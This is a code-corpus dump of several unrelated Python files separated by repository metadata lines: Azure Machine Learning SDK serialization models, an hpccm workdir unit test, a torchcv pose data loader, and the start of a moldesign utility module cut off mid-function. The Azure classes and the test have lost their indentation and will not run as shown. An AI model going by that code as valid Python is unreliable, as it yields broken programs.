key: Optional[str] = None,
cname: Optional[str] = None,
**kwargs
):
super(SslConfiguration, self).__init__(**kwargs)
self.status = status
self.cert = cert
self.key = key
self.cname = cname
class SystemService(msrest.serialization.Model):
"""A system service running on a compute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar system_service_type: The type of this system service.
:vartype system_service_type: str
:ivar public_ip_address: Public IP address.
:vartype public_ip_address: str
:ivar version: The version for this type.
:vartype version: str
"""
_validation = {
'system_service_type': {'readonly': True},
'public_ip_address': {'readonly': True},
'version': {'readonly': True},
}
_attribute_map = {
'system_service_type': {'key': 'systemServiceType', 'type': 'str'},
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SystemService, self).__init__(**kwargs)
self.system_service_type = None
self.public_ip_address = None
self.version = None
class UpdateWorkspaceQuotas(msrest.serialization.Model):
"""The properties for update Quota response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:ivar unit: An enum describing the unit of quota measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
:param status: Status of update workspace quota. Possible values include: "Undefined",
"Success", "Failure", "InvalidQuotaBelowClusterMinimum",
"InvalidQuotaExceedsSubscriptionLimit", "InvalidVMFamilyName", "OperationNotSupportedForSku",
"OperationNotEnabledForRegion".
:type status: str or ~azure.mgmt.machinelearningservices.models.Status
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'unit': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
*,
limit: Optional[int] = None,
status: Optional[Union[str, "Status"]] = None,
**kwargs
):
super(UpdateWorkspaceQuotas, self).__init__(**kwargs)
self.id = None
self.type = None
self.limit = limit
self.unit = None
self.status = status
class UpdateWorkspaceQuotasResult(msrest.serialization.Model):
"""The result of update workspace quota.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of workspace quota update result.
:vartype value: list[~azure.mgmt.machinelearningservices.models.UpdateWorkspaceQuotas]
:ivar next_link: The URI to fetch the next page of workspace quota update result. Call
ListNext() with this to fetch the next page of Workspace Quota update result.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[UpdateWorkspaceQuotas]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UpdateWorkspaceQuotasResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class Usage(msrest.serialization.Model):
"""Describes AML Resource Usage.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:ivar unit: An enum describing the unit of usage measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.UsageUnit
:ivar current_value: The current usage of the resource.
:vartype current_value: long
:ivar limit: The maximum permitted usage of the resource.
:vartype limit: long
:ivar name: The name of the type of usage.
:vartype name: ~azure.mgmt.machinelearningservices.models.UsageName
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'unit': {'readonly': True},
'current_value': {'readonly': True},
'limit': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'long'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
def __init__(
self,
**kwargs
):
super(Usage, self).__init__(**kwargs)
self.id = None
self.type = None
self.unit = None
self.current_value = None
self.limit = None
self.name = None
class UsageName(msrest.serialization.Model):
"""The Usage Names.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The name of the resource.
:vartype value: str
:ivar localized_value: The localized name of the resource.
:vartype localized_value: str
"""
_validation = {
'value': {'readonly': True},
'localized_value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsageName, self).__init__(**kwargs)
self.value = None
self.localized_value = None
class UserAccountCredentials(msrest.serialization.Model):
"""Settings for user account that gets created on each on the nodes of a compute.
All required parameters must be populated in order to send to Azure.
:param admin_user_name: Required. Name of the administrator user account which can be used to
SSH to nodes.
:type admin_user_name: str
:param admin_user_ssh_public_key: SSH public key of the administrator user account.
:type admin_user_ssh_public_key: str
    :param admin_user_password: Password of the administrator user account.
:type admin_user_password: str
"""
_validation = {
'admin_user_name': {'required': True},
}
_attribute_map = {
'admin_user_name': {'key': 'adminUserName', 'type': 'str'},
'admin_user_ssh_public_key': {'key': 'adminUserSshPublicKey', 'type': 'str'},
'admin_user_password': {'key': 'adminUserPassword', 'type': 'str'},
}
def __init__(
self,
*,
admin_user_name: str,
admin_user_ssh_public_key: Optional[str] = None,
admin_user_password: Optional[str] = None,
**kwargs
):
super(UserAccountCredentials, self).__init__(**kwargs)
self.admin_user_name = admin_user_name
self.admin_user_ssh_public_key = admin_user_ssh_public_key
        self.admin_user_password = admin_user_password
class VirtualMachine(Compute):
"""A Machine Learning compute based on Azure Virtual Machines.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.VirtualMachineProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'VirtualMachineProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["VirtualMachineProperties"] = None,
**kwargs
):
super(VirtualMachine, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'VirtualMachine' # type: str
self.properties = properties
class VirtualMachineProperties(msrest.serialization.Model):
"""VirtualMachineProperties.
:param virtual_machine_size: Virtual Machine size.
:type virtual_machine_size: str
:param ssh_port: Port open for ssh connections.
:type ssh_port: int
:param address: Public IP address of the virtual machine.
:type address: str
:param administrator_account: Admin credentials for virtual machine.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_attribute_map = {
'virtual_machine_size': {'key': 'virtualMachineSize', 'type': 'str'},
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'address': {'key': 'address', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
virtual_machine_size: Optional[str] = None,
ssh_port: Optional[int] = None,
address: Optional[str] = None,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(VirtualMachineProperties, self).__init__(**kwargs)
self.virtual_machine_size = virtual_machine_size
self.ssh_port = ssh_port
self.address = address
self.administrator_account = administrator_account
class VirtualMachineSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on AKS.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param administrator_account: Admin credentials for virtual machine.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(VirtualMachineSecrets, self).__init__(**kwargs)
self.compute_type = 'VirtualMachine' # type: str
self.administrator_account = administrator_account
class VirtualMachineSize(msrest.serialization.Model):
"""Describes the properties of a VM size.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the virtual machine size.
:vartype name: str
:ivar family: The family name of the virtual machine size.
:vartype family: str
:ivar v_cp_us: The number of vCPUs supported by the virtual machine size.
:vartype v_cp_us: int
    :ivar gpus: The number of GPUs supported by the virtual machine size.
:vartype gpus: int
:ivar os_vhd_size_mb: The OS VHD disk size, in MB, allowed by the virtual machine size.
:vartype os_vhd_size_mb: int
:ivar max_resource_volume_mb: The resource volume size, in MB, allowed by the virtual machine
size.
:vartype max_resource_volume_mb: int
:ivar memory_gb: The amount of memory, in GB, supported by the virtual machine size.
:vartype memory_gb: float
:ivar low_priority_capable: Specifies if the virtual machine size supports low priority VMs.
:vartype low_priority_capable: bool
:ivar premium_io: Specifies if the virtual machine size supports premium IO.
:vartype premium_io: bool
:param estimated_vm_prices: The estimated price information for using a VM.
:type estimated_vm_prices: ~azure.mgmt.machinelearningservices.models.EstimatedVMPrices
:param supported_compute_types: Specifies the compute types supported by the virtual machine
size.
:type supported_compute_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'family': {'readonly': True},
'v_cp_us': {'readonly': True},
'gpus': {'readonly': True},
'os_vhd_size_mb': {'readonly': True},
'max_resource_volume_mb': {'readonly': True},
'memory_gb': {'readonly': True},
'low_priority_capable': {'readonly': True},
'premium_io': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'family': {'key': 'family', 'type': 'str'},
'v_cp_us': {'key': 'vCPUs', 'type': 'int'},
'gpus': {'key': 'gpus', 'type': 'int'},
'os_vhd_size_mb': {'key': 'osVhdSizeMB', 'type': 'int'},
'max_resource_volume_mb': {'key': 'maxResourceVolumeMB', 'type': 'int'},
'memory_gb': {'key': 'memoryGB', 'type': 'float'},
'low_priority_capable': {'key': 'lowPriorityCapable', 'type': 'bool'},
'premium_io': {'key': 'premiumIO', 'type': 'bool'},
'estimated_vm_prices': {'key': 'estimatedVMPrices', 'type': 'EstimatedVMPrices'},
'supported_compute_types': {'key': 'supportedComputeTypes', 'type': '[str]'},
}
def __init__(
self,
*,
estimated_vm_prices: Optional["EstimatedVMPrices"] = None,
supported_compute_types: Optional[List[str]] = None,
**kwargs
):
super(VirtualMachineSize, self).__init__(**kwargs)
self.name = None
self.family = None
self.v_cp_us = None
self.gpus = None
self.os_vhd_size_mb = None
self.max_resource_volume_mb = None
self.memory_gb = None
self.low_priority_capable = None
self.premium_io = None
self.estimated_vm_prices = estimated_vm_prices
self.supported_compute_types = supported_compute_types
class VirtualMachineSizeListResult(msrest.serialization.Model):
"""The List Virtual Machine size operation response.
:param aml_compute: The list of virtual machine sizes supported by AmlCompute.
:type aml_compute: list[~azure.mgmt.machinelearningservices.models.VirtualMachineSize]
"""
_attribute_map = {
'aml_compute': {'key': 'amlCompute', 'type': '[VirtualMachineSize]'},
}
def __init__(
self,
*,
aml_compute: Optional[List["VirtualMachineSize"]] = None,
**kwargs
):
super(VirtualMachineSizeListResult, self).__init__(**kwargs)
self.aml_compute = aml_compute
class VirtualMachineSshCredentials(msrest.serialization.Model):
"""Admin credentials for virtual machine.
:param username: Username of admin account.
:type username: str
:param password: Password of admin account.
:type password: str
:param public_key_data: Public key data.
:type public_key_data: str
:param private_key_data: Private key data.
:type private_key_data: str
"""
_attribute_map = {
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
'public_key_data': {'key': 'publicKeyData', 'type': 'str'},
'private_key_data': {'key': 'privateKeyData', 'type': 'str'},
}
def __init__(
self,
*,
username: Optional[str] = None,
password: Optional[str] = None,
public_key_data: Optional[str] = None,
private_key_data: Optional[str] = None,
**kwargs
):
super(VirtualMachineSshCredentials, self).__init__(**kwargs)
self.username = username
self.password = password
self.public_key_data = public_key_data
self.private_key_data = private_key_data
class Workspace(Resource):
"""An object that represents a machine learning workspace.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar workspace_id: The immutable id associated with this workspace.
:vartype workspace_id: str
:param description: The description of this workspace.
:type description: str
    :param friendly_name: The friendly name for this workspace. This name is mutable.
:type friendly_name: str
:ivar creation_time: The creation time of the machine learning workspace in ISO8601 format.
:vartype creation_time: ~datetime.datetime
:param key_vault: ARM id of the key vault associated with this workspace. This cannot be
changed once the workspace has been created.
:type key_vault: str
:param application_insights: ARM id of the application insights associated with this workspace.
This cannot be changed once the workspace has been created.
:type application_insights: str
:param container_registry: ARM id of the container registry associated with this workspace.
This cannot be changed once the workspace has been created.
:type container_registry: str
:param storage_account: ARM id of the storage account associated with this workspace. This
cannot be changed once the workspace has been created.
:type storage_account: str
:param discovery_url: Url for the discovery service to identify regional endpoints for machine
learning experimentation services.
:type discovery_url: str
:ivar provisioning_state: The current deployment state of workspace resource. The
provisioningState is to indicate states for resource provisioning. Possible values include:
"Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param encryption: The encryption settings of Azure ML workspace.
:type encryption: ~azure.mgmt.machinelearningservices.models.EncryptionProperty
:param hbi_workspace: The flag to signal HBI data in the workspace and reduce diagnostic data
collected by the service.
:type hbi_workspace: bool
:ivar service_provisioned_resource_group: The name of the managed resource group created by
workspace RP in customer subscription if the workspace is CMK workspace.
:vartype service_provisioned_resource_group: str
:ivar private_link_count: Count of private connections in the workspace.
:vartype private_link_count: int
:param image_build_compute: The compute name for image build.
:type image_build_compute: str
:param allow_public_access_when_behind_vnet: The flag to indicate whether to allow public
access when behind VNet.
:type allow_public_access_when_behind_vnet: bool
:ivar private_endpoint_connections: The list of private endpoint connections in the workspace.
:vartype private_endpoint_connections:
list[~azure.mgmt.machinelearningservices.models.PrivateEndpointConnection]
:param shared_private_link_resources: The list of shared private link resources in this
workspace.
:type shared_private_link_resources:
list[~azure.mgmt.machinelearningservices.models.SharedPrivateLinkResource]
:ivar notebook_info: The notebook info of Azure ML workspace.
:vartype notebook_info: ~azure.mgmt.machinelearningservices.models.NotebookResourceInfo
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'workspace_id': {'readonly': True},
'creation_time': {'readonly': True},
'provisioning_state': {'readonly': True},
'service_provisioned_resource_group': {'readonly': True},
'private_link_count': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
'notebook_info': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'workspace_id': {'key': 'properties.workspaceId', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'friendly_name': {'key': 'properties.friendlyName', 'type': 'str'},
'creation_time': {'key': 'properties.creationTime', 'type': 'iso-8601'},
'key_vault': {'key': 'properties.keyVault', 'type': 'str'},
'application_insights': {'key': 'properties.applicationInsights', 'type': 'str'},
'container_registry': {'key': 'properties.containerRegistry', 'type': 'str'},
'storage_account': {'key': 'properties.storageAccount', 'type': 'str'},
'discovery_url': {'key': 'properties.discoveryUrl', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'encryption': {'key': 'properties.encryption', 'type': 'EncryptionProperty'},
'hbi_workspace': {'key': 'properties.hbiWorkspace', 'type': 'bool'},
'service_provisioned_resource_group': {'key': 'properties.serviceProvisionedResourceGroup', 'type': 'str'},
'private_link_count': {'key': 'properties.privateLinkCount', 'type': 'int'},
'image_build_compute': {'key': 'properties.imageBuildCompute', 'type': 'str'},
'allow_public_access_when_behind_vnet': {'key': 'properties.allowPublicAccessWhenBehindVnet', 'type': 'bool'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
'shared_private_link_resources': {'key': 'properties.sharedPrivateLinkResources', 'type': '[SharedPrivateLinkResource]'},
'notebook_info': {'key': 'properties.notebookInfo', 'type': 'NotebookResourceInfo'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
description: Optional[str] = None,
friendly_name: Optional[str] = None,
key_vault: Optional[str] = None,
application_insights: Optional[str] = None,
container_registry: Optional[str] = None,
storage_account: Optional[str] = None,
discovery_url: Optional[str] = None,
encryption: Optional["EncryptionProperty"] = None,
hbi_workspace: Optional[bool] = False,
image_build_compute: Optional[str] = None,
allow_public_access_when_behind_vnet: Optional[bool] = False,
shared_private_link_resources: Optional[List["SharedPrivateLinkResource"]] = None,
**kwargs
):
super(Workspace, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.workspace_id = None
self.description = description
self.friendly_name = friendly_name
self.creation_time = None
self.key_vault = key_vault
self.application_insights = application_insights
self.container_registry = container_registry
self.storage_account = storage_account
self.discovery_url = discovery_url
self.provisioning_state = None
self.encryption = encryption
self.hbi_workspace = hbi_workspace
self.service_provisioned_resource_group = None
self.private_link_count = None
self.image_build_compute = image_build_compute
self.allow_public_access_when_behind_vnet = allow_public_access_when_behind_vnet
self.private_endpoint_connections = None
self.shared_private_link_resources = shared_private_link_resources
self.notebook_info = None
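# Illustrative usage sketch (not part of the generated model code): a minimal
# Workspace body as it might be passed to a create_or_update call. All ARM
# resource ids below are placeholders, not real resources.
#
#   ws = Workspace(
#       location="eastus",
#       sku=Sku(name="Basic", tier="Basic"),
#       friendly_name="my-workspace",
#       key_vault="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<kv>",
#       storage_account="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<sa>",
#   )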
class WorkspaceConnection(msrest.serialization.Model):
"""Workspace connection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the workspace connection.
:vartype id: str
:ivar name: Friendly name of the workspace connection.
:vartype name: str
:ivar type: Resource type of workspace connection.
:vartype type: str
:param category: Category of the workspace connection.
:type category: str
:param target: Target of the workspace connection.
:type target: str
:param auth_type: Authorization type of the workspace connection.
:type auth_type: str
:param value: Value details of the workspace connection.
:type value: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'category': {'key': 'properties.category', 'type': 'str'},
'target': {'key': 'properties.target', 'type': 'str'},
'auth_type': {'key': 'properties.authType', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
def __init__(
self,
*,
category: Optional[str] = None,
target: Optional[str] = None,
auth_type: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(WorkspaceConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.category = category
self.target = target
self.auth_type = auth_type
self.value = value
class WorkspaceConnectionDto(msrest.serialization.Model):
"""object used for creating workspace connection.
:param name: Friendly name of the workspace connection.
:type name: str
:param category: Category of the workspace connection.
:type category: str
:param target: Target of the workspace connection.
:type target: str
:param auth_type: Authorization type of the workspace connection.
:type auth_type: str
:param value: Value details of the workspace connection.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'category': {'key': 'properties.category', 'type': 'str'},
'target': {'key': 'properties.target', 'type': 'str'},
'auth_type': {'key': 'properties.authType', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
category: Optional[str] = None,
target: Optional[str] = None,
auth_type: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(WorkspaceConnectionDto, self).__init__(**kwargs)
self.name = name
self.category = category
self.target = target
self.auth_type = auth_type
self.value = value
class WorkspaceListResult(msrest.serialization.Model):
"""The result of a request to list machine learning workspaces.
:param value: The list of machine learning workspaces. Since this list may be incomplete, the
nextLink field should be used to request the next list of machine learning workspaces.
:type value: list[~azure.mgmt.machinelearningservices.models.Workspace]
:param next_link: The URI that can be used to request the next list of machine learning
workspaces.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Workspace]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["Workspace"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(WorkspaceListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class WorkspaceSku(msrest.serialization.Model):
"""AML workspace sku information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar resource_type:
:vartype resource_type: str
:ivar skus: The list of workspace sku settings.
:vartype skus: list[~azure.mgmt.machinelearningservices.models.SkuSettings]
"""
_validation = {
'resource_type': {'readonly': True},
'skus': {'readonly': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'skus': {'key': 'skus', 'type': '[SkuSettings]'},
}
def __init__(
self,
**kwargs
):
super(WorkspaceSku, self).__init__(**kwargs)
self.resource_type = None
self.skus = None
class WorkspaceUpdateParameters(msrest.serialization.Model):
"""The parameters for updating a machine learning workspace.
:param tags: A set of tags. The resource tags for the machine learning workspace.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:param description: The description of this workspace.
:type description: str
:param friendly_name: The friendly name for this workspace.
:type friendly_name: str
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'friendly_name': {'key': 'properties.friendlyName', 'type': 'str'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
description: Optional[str] = None,
friendly_name: Optional[str] = None,
**kwargs
):
super(WorkspaceUpdateParameters, self).__init__(**kwargs)
self.tags = tags
self.sku = sku
self.description = description
self.friendly_name = friendly_name
|
test/test_workdir.py
|
robertmaynard/hpc-container-maker
| 340 |
129369
|
<gh_stars>100-1000
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods
"""Test cases for the workdir module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import bash, docker, invalid_ctype, singularity
from hpccm.primitives.workdir import workdir
class Test_workdir(unittest.TestCase):
def setUp(self):
"""Disable logging output messages"""
logging.disable(logging.ERROR)
@docker
def test_empty(self):
"""No workdir specified"""
w = workdir()
self.assertEqual(str(w), '')
@invalid_ctype
def test_invalid_ctype(self):
"""Invalid container type specified"""
w = workdir(directory='foo')
with self.assertRaises(RuntimeError):
str(w)
@docker
def test_dir_docker(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), 'WORKDIR foo')
@singularity
def test_dir_singularity(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), '%post\n cd /\n mkdir -p foo\n cd foo')
@bash
def test_dir_bash(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), '')
|
data/pose/data_loader.py
|
qrsforever/torchcv
| 171 |
129385
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: <NAME>(<EMAIL>)
# Class for the Pose Data Loader.
from torch.utils import data
import lib.data.pil_aug_transforms as pil_aug_trans
import lib.data.cv2_aug_transforms as cv2_aug_trans
import lib.data.transforms as trans
from lib.data.collate import collate
from lib.tools.util.logger import Logger as Log
from data.pose.datasets.default_cpm_dataset import DefaultCPMDataset
from data.pose.datasets.default_openpose_dataset import DefaultOpenPoseDataset
class DataLoader(object):
def __init__(self, configer):
self.configer = configer
if self.configer.get('data', 'image_tool') == 'pil':
self.aug_train_transform = pil_aug_trans.PILAugCompose(self.configer, split='train')
elif self.configer.get('data', 'image_tool') == 'cv2':
self.aug_train_transform = cv2_aug_trans.CV2AugCompose(self.configer, split='train')
else:
Log.error('Not support {} image tool.'.format(self.configer.get('data', 'image_tool')))
exit(1)
if self.configer.get('data', 'image_tool') == 'pil':
self.aug_val_transform = pil_aug_trans.PILAugCompose(self.configer, split='val')
elif self.configer.get('data', 'image_tool') == 'cv2':
self.aug_val_transform = cv2_aug_trans.CV2AugCompose(self.configer, split='val')
else:
Log.error('Not support {} image tool.'.format(self.configer.get('data', 'image_tool')))
exit(1)
self.img_transform = trans.Compose([
trans.ToTensor(),
trans.Normalize(**self.configer.get('data', 'normalize')), ])
def get_trainloader(self):
if self.configer.get('dataset', default=None) == 'default_cpm':
dataset = DefaultCPMDataset(root_dir=self.configer.get('data', 'data_dir'), dataset='train',
aug_transform=self.aug_train_transform,
img_transform=self.img_transform,
configer=self.configer)
elif self.configer.get('dataset', default=None) == 'default_openpose':
dataset = DefaultOpenPoseDataset(root_dir=self.configer.get('data', 'data_dir'), dataset='train',
aug_transform=self.aug_train_transform,
img_transform=self.img_transform,
configer=self.configer)
else:
Log.error('{} dataset is invalid.'.format(self.configer.get('dataset', default=None)))
exit(1)
trainloader = data.DataLoader(
dataset,
batch_size=self.configer.get('train', 'batch_size'), shuffle=True,
num_workers=self.configer.get('data', 'workers'), pin_memory=True,
drop_last=self.configer.get('data', 'drop_last'),
collate_fn=lambda *args: collate(
*args, trans_dict=self.configer.get('train', 'data_transformer')
)
)
return trainloader
def get_valloader(self, dataset=None):
dataset = 'val' if dataset is None else dataset
if self.configer.get('dataset', default=None) == 'default_cpm':
dataset = DefaultCPMDataset(root_dir=self.configer.get('data', 'data_dir'), dataset=dataset,
aug_transform=self.aug_val_transform,
img_transform=self.img_transform,
configer=self.configer)
elif self.configer.get('dataset', default=None) == 'default_openpose':
dataset = DefaultOpenPoseDataset(root_dir=self.configer.get('data', 'data_dir'), dataset=dataset,
aug_transform=self.aug_val_transform,
img_transform=self.img_transform,
                                             configer=self.configer)
else:
Log.error('{} dataset is invalid.'.format(self.configer.get('dataset')))
exit(1)
valloader = data.DataLoader(
dataset,
batch_size=self.configer.get('val', 'batch_size'), shuffle=False,
num_workers=self.configer.get('data', 'workers'), pin_memory=True,
collate_fn=lambda *args: collate(
*args, trans_dict=self.configer.get('val', 'data_transformer')
)
)
return valloader
if __name__ == "__main__":
# Test data loader.
pass
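    # Illustrative sketch of the intended usage (assumes a populated `configer`
    # object from the torchcv configuration system, which is not constructed here):
    #
    #   loader = DataLoader(configer)
    #   train_loader = loader.get_trainloader()
    #   val_loader = loader.get_valloader()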
|
moldesign/utils/utils.py
|
Autodesk/molecular-design-toolkit
| 147 |
129401
|
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
import future.utils
from functools import reduce
import fractions
import operator
import os
import re
import sys
import tempfile
from html.parser import HTMLParser
def make_none(*args, **kwargs):
return None
def if_not_none(item, default):
